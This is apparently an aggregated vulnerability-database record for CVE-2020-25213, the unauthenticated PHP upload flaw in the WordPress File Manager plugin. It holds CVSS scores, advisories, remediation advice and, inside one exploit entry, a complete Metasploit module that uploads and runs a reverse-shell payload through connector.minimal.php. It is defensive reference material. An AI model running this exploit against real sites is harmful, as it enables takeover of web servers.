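The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote, unauthenticated attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension, which leaves that connector (lib/php/connector.minimal.php) directly requestable. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020. Deactivating the plugin does not remove the exposed file; the remedy is to update to 6.9 or later or to remove the plugin. On a site that ran an affected version, unexpected .php files under lib/files/ are a possible sign of compromise and should be investigated.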
{"id": "CVE-2020-25213", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-25213", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.", "published": "2020-09-09T16:15:00", "modified": "2022-01-01T18:37:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25213", "reporter": "cve@mitre.org", "references": ["https://plugins.trac.wordpress.org/changeset/2373068", "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", 
"https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "https://wordpress.org/plugins/wp-file-manager/#developers", "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "https://github.com/w4fz5uck5/wp-file-manager-0day", "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2022-03-23T15:45:16", "viewCount": 566, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49178"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-WP_FILE_MANAGER_RCE-"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "patchstack", "idList": ["PATCHSTACK:22CAF9945B1CE625DD44B6A478A41801"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}]}, "exploitation": {"wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}], "wildExploited": true}, "score": {"value": 6.3, "vector": "NONE"}, "twitter": {"counter": 28, 
"tweets": [{"link": "https://twitter.com/XopxeCG/status/1358903419994570752", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) https://t.co/ZLxlYOLA9h?amp=1"}, {"link": "https://twitter.com/UpsidedownCanuk/status/1358930208934424576", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213)\nhttps://t.co/1J31cDM3SY?amp=1"}, {"link": "https://twitter.com/VulmonFeeds/status/1369454538177011714", "text": "CVE-2020-25213\n\nThe File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to ha...\n\nhttps://t.co/Nf5iblcMjP?amp=1"}, {"link": "https://twitter.com/UpsidedownCanuk/status/1358931800635056129", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) posted by AlienVault on /alienvault OTX: /pulse/6021a425750b50dafcc48a26/"}, {"link": "https://twitter.com/PVynckier/status/1361545905615351808", "text": "CVE-2020-25213: Critical Vulnerability in File Manager WordPress Plugin Exploited in the Wild - Blog | Tenable\u00ae"}, {"link": "https://twitter.com/hackingcoil/status/1359157041080713222", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) \nFebruary 7, 2021\n/hashtag/Malware_updates?src=hashtag_click\nhttps://t.co/7M3Ro4ZFZ2?amp=1"}, {"link": "https://twitter.com/DeliveredDATA/status/1358886320295313409", "text": "Exploits in the Wild for WordPress File Manager RCE Vulnerability (CVE-2020-25213) https://t.co/PAw6pBzf2e?amp=1"}, {"link": "https://twitter.com/F5Labs/status/1390011935358394371", "text": "Web attacks against Argentina, Brazil, Chile, Colombia, and Panama are looking for CVE-2020-15505, CVE-2017-9841, CVE-2020-25213, CVE-2018-20062, CVE-2020-20578, and many more. /hashtag/Latin?src=hashtag_click America. Story from /dunsany and Malcolm Heath. 
https://t.co/qtacjjJMu2?amp=1"}, {"link": "https://twitter.com/F5Labs/status/1391513334743244805", "text": "Web attacks against Argentina, Brazil, Chile, Colombia, and Panama are looking for CVE-2020-15505, CVE-2017-9841, CVE-2020-25213, CVE-2018-20062, CVE-2020-20578, and many more. /hashtag/Latin?src=hashtag_click America. Story from /dunsany and Malcolm Heath. https://t.co/Faql9DIUY3?amp=1"}, {"link": "https://twitter.com/VulmonFeeds/status/1428679573261242368", "text": "CVE-2020-25213\n\nThe File Manager (wp-file-manager) plugin before 6.9 for WordPress allow...\n\nhttps://t.co/Nf5iblcMjP?amp=1\n\nVulnerability Notification: https://t.co/xhLrNnfyrO?amp=1"}], "modified": "2021-04-23T01:09:38"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49178"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}]}, "affected_software": {"major_version": [{"name": "webdesi9 file manager", "version": 6}]}, "vulnersScore": 6.3}, "_state": {"wildexploited": 0, "dependencies": 1660004461, "score": 1659882119, "cisa_kev_wildexploited": 1660152412, "affected_software_major_version": 1671590614}, "_internal": {"score_hash": 
"4277d2fa95ae2830f689fa0e92694251"}, "cna_cvss": {"cna": "MITRE", "cvss": {"3": {"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "score": 10.0}}}, "cpe": [], "cpe23": [], "cwe": ["CWE-434"], "affectedSoftware": [{"cpeName": "webdesi9:file_manager", "version": "6.9", "operator": "lt", "name": "webdesi9 file manager"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:webdesi9:file_manager:6.9:*:*:*:*:wordpress:*:*", "versionEndExcluding": "6.9", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://plugins.trac.wordpress.org/changeset/2373068", "name": "https://plugins.trac.wordpress.org/changeset/2373068", "refsource": "MISC", "tags": ["Patch", "Third Party Advisory"]}, {"url": "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "name": "https://hotforsecurity.bitdefender.com/blog/wordpress-websites-attacked-via-file-manager-plugin-vulnerability-24048.html", "refsource": "MISC", "tags": ["Third Party Advisory"]}, {"url": "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "name": "https://zdnet.com/article/millions-of-wordpress-sites-are-being-probed-attacked-with-recent-plugin-bug/", "refsource": "MISC", "tags": ["Press/Media Coverage", "Third Party Advisory"]}, {"url": "https://wordpress.org/plugins/wp-file-manager/#developers", "name": "https://wordpress.org/plugins/wp-file-manager/#developers", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "name": "https://seravo.com/blog/0-day-vulnerability-in-wp-file-manager/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": 
"https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "name": "https://wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/w4fz5uck5/wp-file-manager-0day", "name": "https://github.com/w4fz5uck5/wp-file-manager-0day", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "name": "http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}], "product_info": []}
{"patchstack": [{"lastseen": "2022-06-01T19:34:27", "description": "Unauthenticated Arbitrary File Upload leading to RCE vulnerability found by w4fz5uck5 in WordPress File Manager plugin (versions <= 6.8).\n\n## Solution\n\n\r\n Update the WordPress File Manager plugin to the latest available version (at least 6.9).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-01T00:00:00", "type": "patchstack", "title": "WordPress File Manager plugin <= 6.8 - Unauthenticated Arbitrary File Upload leading to RCE vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-01T00:00:00", "id": "PATCHSTACK:22CAF9945B1CE625DD44B6A478A41801", "href": "https://patchstack.com/database/vulnerability/wp-file-manager/wordpress-file-manager-plugin-6-8-unauthenticated-arbitrary-file-upload-leading-to-rce-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:21:15", "description": "Seravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, 
which was the latest version available in wordpress.org). File lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution. It seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\n\n### PoC\n\nhttps://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py \n \n\n", "cvss3": {}, "published": "2020-09-01T00:00:00", "type": "wpvulndb", "title": "File Manager 6.0-6.9 - Unauthenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-25213"], "modified": "2020-12-02T14:48:23", "id": "WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9", "href": "https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:55:51", "description": "# WPKiller v1.0 \u2714\n\nWordpress Security Scanner, WPKiller Allows y...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-13T14:47:27", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2021-04-26T06:21:07", "id": "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T01:37:37", "description": "# WP-file-manager expoit [CVE-2020-25213](https://nvd.nist.gov/v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-10T17:50:01", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2022-08-17T00:07:01", "id": "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "href": "", "cvss": {"score": 7.5, 
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-22T05:18:58", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-11-10T00:00:00", "type": "zdt", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-11-10T00:00:00", "id": "1337DAY-ID-35215", "href": "https://0day.today/exploit/description/35215", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include 
Msf::Exploit::Remote::HTTP::Wordpress\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\n 'Description' => %q{\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\n ],\n 'References' =>\n [\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\n [ 'CVE', '2020-25213' ]\n ],\n 'Platform' => [ 'php' ],\n 'Privileged' => false,\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [\n 'WordPress File Manager 6.0-6.8',\n {\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\n 'DefaultTarget' => 0\n )\n )\n register_options(\n [\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\n ]\n )\n end\n\n def check\n return CheckCode::Unknown unless wordpress_and_online?\n\n # check the plugin version from readme\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\n end\n\n def exploit\n # base path to File Manager plugin\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\n # filename of the file 
to be uploaded/created\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\n register_file_for_cleanup(filename)\n\n case datastore['COMMAND']\n when 'upload'\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\n when 'mkfile+put'\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\n end\n\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\n # execute the payload\n send_request_cgi('uri' => normalize_uri(payload_uri))\n end\n\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\n filename = opts['filename']\n\n # prep for exploit\n post_data = Rex::MIME::Message.new\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\n\n case elfinder_cmd\n when 'upload'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\n when 'mkfile'\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\n when 'put'\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\n end\n\n res = send_request_cgi(\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'data' => post_data.to_s\n )\n\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP 
response code: #{res.code}\") unless res.code == 200\n end\nend\n", "sourceHref": "https://0day.today/exploit/35215", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:46", "description": "A remote code execution vulnerability exists in WordPress File Manager Plugin. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-29T00:00:00", "type": "checkpoint_advisories", "title": "WordPress File Manager Plugin Remote Code Execution (CVE-2020-25213)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-29T00:00:00", "id": "CPAI-2020-0869", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2021-07-20T20:13:13", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to 
have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. This was exploited in the wild in August and September 2020.\n\n \n**Recent assessments:** \n \n**space-r7** at November 10, 2020 3:10pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\n**wvu-r7** at September 29, 2020 8:28pm UTC reported:\n\nRating this as very high as this is a widespread Wordpress plugin, and the vulnerability is easily exploitable. The vulnerability is due to an example file, `lib/php/connector.minimal.php`, being left over in installations of the plugin. The file enables unauthenticated execution of select commands including an `upload` command that allows for file upload which can lead to code execution on the server.\n\nNote that disabling the plugin in Wordpress does not fix the vulnerability. 
The plugin should either be removed or updated to the patched version, which is `v6.9`.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-25213", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2020-09-15T00:00:00", "id": "AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "href": "https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "The File Manager (wp-file-manager) plugin before 6.9 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 
"HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "WordPress File Manager Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25213"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-25213", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-11-10T15:38:59", "description": "", "cvss3": {}, "published": "2020-11-10T00:00:00", "type": "packetstorm", "title": "WordPress File Manager 6.8 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-25213"], 